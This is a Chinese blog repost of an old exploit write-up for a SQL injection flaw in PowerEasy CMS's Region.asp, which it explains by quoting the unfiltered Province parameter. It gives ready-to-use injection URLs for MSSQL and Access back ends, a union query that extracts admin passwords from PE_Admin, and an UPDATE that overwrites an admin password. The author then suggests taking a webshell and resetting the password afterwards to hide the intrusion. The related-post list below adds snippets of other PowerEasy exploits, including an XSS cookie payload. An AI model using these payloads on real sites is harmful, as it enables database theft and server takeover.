动易0day--Region.asp注入

最新推荐文章于 2021-06-25 02:25:09 发布
最新推荐文章于 2021-06-25 02:25:09 发布
阅读量1.2k 收藏
点赞数
分类专栏: study files 文章标签: access sql shell 编程 user web

ps: 虽然是老文 但觉得触发的思路不错 所以转载之

 

 

今天下午看了一个下午的动网代码,头甚是疼,于是晚上回来,找找动易更有其他漏洞没,结果一看,还真有一处,逻辑错误!
在Region.asp中
Country = ReplaceBadChar(Trim(Request("Country")))
Province = ReplaceBadChar(Trim(Request("Province")))
City = ReplaceBadChar(Trim(Request("City")))
对任何传入的变量都进行了过滤,但是编程者在这里:
Set TempRs = Conn.Execute("SELECT Province FROM PE_Province WHERE Country='" & Country & "' ORDER BY ProvinceID")
If Err Or TempRs.EOF Then
ReDim ShowProvince(0, 0)
Province = Trim(Request.QueryString("Province"))
Else
ShowProvince = TempRs.GetRows(-1)
End If
Set TempRs = Conn.Execute("SELECT DISTINCT City FROM PE_City WHERE Province='" & Province & "'")
大 家能够看到,Province = Trim(Request.QueryString("Province")) 这里直接取的是传入的Province,而不是过滤后的,所以这个Province变量危险了,那么在下面他是直接带入了查询,由于Province变量 是我们能够随意构造的,所以我们就能够构造我们的SQL语句。

但是要进入这个查询的前提是:Err=true 或 TempRs.EOF,而要达到这2个中的一个,就是要让Conn.Execute("SELECT Province FROM PE_Province WHERE Country='" & Country & "' ORDER BY ProvinceID")这条语句在表中查询不到所要找的Country,这样就好构造了。下面是利用代码:

0--" target=_blank>http://127.0.0.1/Region.asp?Country=tt&City=whytt&Province=shi' and user>0--

就是在

http://127.0.0.1/Region.asp?Country=tt&City=whytt&Province=shi' 后面加上我们的SQL注入语句。

这就是整个利用原理,很简单,但也很致命的漏洞。

上面是MSSQL版本的利用,而假如要是ACCESS版本中的利用,那么怎么办呢,呵呵,聪明的您可能觉得我在说废话老,看吧。

http://127.0.0.1/Region.asp?Country=tt&City=whytt&Province=shi' and 1=1 and '1'='1

这样的话,我们的and 1=1就是在access版本中的利用。呵呵。这样就完成这个漏洞在2个版本的利用。

http://127.0.0.1/Region.asp?Country=tt&City=whytt&Province=shi&#39; and 1=2 union select password from PE_Admin where 1<2 and '1'='1

其中username是要暴的字段,哈哈,通杀的感觉爽吧


补充:

update PE_Admin set Password='13955235245b2497' where id=2--

假如不能够列目录就插管理员,但我喜欢直接update管理员密码,拿完shell后改回来,或去加一个

假如能够列目录就直接找web目录,然后用nb的getwebshell就能够拿到webshell了

link641
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
又一动易0day
weixin_33701564的博客
11-20 159
哇哈哈,昨天看到动易出补丁了,甚是郁闷,俺拿到这个0day都还没开始玩,就这样被洗白鸟,郁闷啊,早知道不玩动易主站,而且是get提交方式,当初如果听CN的话,也许这个0day还会一直埋在地下,刚看了下动易的补丁,这次补的地方不至这一个,哈哈,传说的7个以上的bug,不知道还省几个呢?下面是大概一个月前写的东西,发出来给大家搞一些懒惰的管理员,补丁都发2天了,还没补的话,就是管理员的错了哦,呵呵~~...
动易最新ODAY
rjgcwl的专栏
01-14 648
动易最新ODAY 来源:鬼仔S BLOG漏洞利用方法:1.注册一个das.asp的用户名(系统会自动建立一个以用户名为名字的目录)2.传图片木马(主要是利用了2003系统默认对.asp目录的支持,2003系统默认下的.asp目录的特性引起的 。官方动易2006版本同样也存在这
动易html在线编辑器 漏洞,动易NewComment.asp注入漏洞
weixin_36176546的博客
05-30 322
在NewComment.asp文件中ModuleName = Trim(request(\"ModuleName\"))这个ModuleName变量没过滤好,从而导致,我们可以在下面的SQL语句中构造我们的SQL语句If ModuleName <> \"\" ThenIf ChannelID <> 0 ThenIf ClassID <> 0 ThensqlCom...
动易<=SP6注入漏洞(10.31)
weixin_34242509的博客
12-14 206
官方还未出补丁大蝉原创 漏洞:动易&lt;=SP6 Vote.asp 注入漏洞 影响版本:&lt;=SP6 漏洞分析: 在动易系统的投票模块(vote.asp)使用了如下语句: Update PE_Vote set answer" &amp; VoteOption  &amp; "= answer" &amp; VoteOption &amp; "+1 where ID=" &amp; ...
SQL注入漏洞
weixin_44722125的博客
03-17 435
SQL注入攻击是黑客对数据库进行攻击的常用手段之一。随着B/S模式应用开发的发展,使用这种模式编写应用程序的程序员也越来越多。但是由于程序员的水平及经验也参差不齐,相当大一部分程序员在编写代码的时候,没有对用户输入数据的合法性进行判断,使应用程序存在安全隐患。用户可以提交一段数据库查询代码,根据程序返回的结果,获得某些他想得知的数据,这就是所谓的SQL Injection,即SQL注入SQL注...
动易CMS 2007 Beta 3 -ASP源码.zip
12-17
动易CMS 2007 Beta 3 ASP源码详解》 动易CMS(Content Management System)是一款基于ASP(Active Server Pages)技术构建的网站内容管理系统,它为用户提供了一套便捷、高效的网站管理和开发平台。2007年推出的...
动易系统的论坛转贴工具 -ASP源码.zip
12-13
标题中的“动易系统的论坛转贴工具 -ASP源码.zip”揭示了这是一个基于ASP(Active Server Pages)编程语言开发的论坛转贴工具的源代码。ASP是微软公司推出的一种服务器端脚本环境,用于创建动态交互式网页。这个工具...
动易网络全站程序 -ASP源码.zip
02-09
【标题】"动易网络全站程序 -ASP源码.zip" 涉及的主要知识点是ASP(Active Server Pages)编程技术及其在构建网站全站程序中的应用。ASP是一种由微软公司开发的服务器端脚本环境,它允许Web开发者创建动态交互式网页...
爱美娜家庭日记-动易内核.rar
07-05
本系统是一套基于WEB网站管理系统,采用网络中已经成熟、稳定地技术ASP Access开发而成, 通过它,您可以很方便地管理自己网站。 当前本系统已具有如下功能特点: 一、六大功能管理模块,用户管理、下载、文章...
手机图片站源码带全站 动易内核-ASP源码.zip
12-17
【标题】"手机图片站源码带全站 动易内核-ASP源码.zip" 指的是一款基于ASP编程语言开发的、用于构建手机图片站点的源代码。动易内核通常指的是动易网络公司的网站内容管理系统,它以其稳定性和易用性在ASP开发领域...
asp获得当前IP和所在地区
02-05
利用搜狐IP获取接口,简单一句话获取访问者IP地址和所在地区,调用起来也很方便,给初学者学习用。
动易网站管理系统vote.asp页面存在SQL注入漏洞
11-03 3831
  动易网站管理系统vote.asp页面存在SQL注入漏洞   测试系统:   动易(PowerEasy CMS SP6 071030以下版本)   安全综述:   动易网站管理系统是一个采用 ASP 和 MSSQL 等其他多种数据库构建的高效网站内容管理解决方案产品。   漏洞描述:   vote.asp调用了动易组件PE_Site.ShowVote,此组件VoteOption参数过滤不
动易Region.asp漏洞
weixin_30273501的博客
06-25 195
详细说明:今天下午看了一个下午的动网代码,头甚是疼,于是晚上回来,找找动易还有其他漏洞没,结果一看,还真有一处,逻辑错误!在Region.asp中Country = ReplaceBadChar(Trim(Request(\\\"Country\\\")))Province = ReplaceBadChar...
动易网站管理系统Count/Counter.asp页面存在SQL注入漏洞
03-16 562
鬼仔注:h4k_b4n授权( <a href=http://www.huaidan.org/blogtitle=http://www.huaidan.org/blogtarget=_blank target=_blank>http://www.huaidan.org/blog)首发,转载请注明。h4k_b4n授权内容:今天委托鬼仔( <a href
动易漏洞
asp经验积累
02-16 9798
动易漏洞动易网站管理系统是当前中国最具性价比、最受欢迎的CMS系统和电子商务系统,目前已有超过10万个以上网站的应用规模,拥有政府、企业、科研教育和媒体等各个行业领域的几千名商业用户。其中的Region.asp的Province = Trim(Request.QueryString("Province"))语句没经过过滤的,我们可以利用构造我们的SQL语句,进行注入。总是用工具注入,水平也不会提高
动易CMS漏洞收集
08-01 1867
动易SiteWeaver6.8短消息0day跨站漏洞 user用户登陆,默认账号密码 admin/admin888 短消息代码模式下编辑,预览 <imgsrc="../Skin/blue/powerease_logo.gif"onload="resizepic(this);functionresizepic(){alert(document.cookie)};"&...
动易html编辑器漏洞,动易网站管理系统删除任意文件漏洞
weixin_42522626的博客
06-25 695
这个漏洞对于动易网站管理系统来说,就是致命的了。此漏洞存在于User目录下的User_saveflash.asp文件中,其第6~22行代码如下所示。Dim act, ObjInstalled_FSO, color_name, Create_1, imgurl, SaveFileName, dirMonthobjName_FSO = Application("objName_FSO")ObjInst...
动易html在线编辑器 漏洞,动易网站管理系统vote.asp页面存在SQL注入漏洞
weixin_39553904的博客
05-30 999
动易网站管理系统vote.asp页面存在SQL注入漏洞测试系统:动易(PowerEasy CMS SP6 071030以下版本)安全综述:动易网站管理系统是一个采用 ASP 和 MSSQL 等其他多种数据库构建的高效网站内容管理解决方案产品。漏洞描述:vote.asp调用了动易组件PE_Site.ShowVote,此组件VoteOption参数过滤不严,导致可以进行mssql注入但是其语句里面过滤...
动易sf sys.webforms.pagereques details:error
最新发布
09-10
动态内容网站框架(ASP.NET)中的错误“sys.webforms.pagerequestdetails:error”通常是由于在网页请求期间发生了一些错误而引起的。 通常,这种错误可能由以下几个问题引起: 1. 代码错误:在编写ASP.NET网页时...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值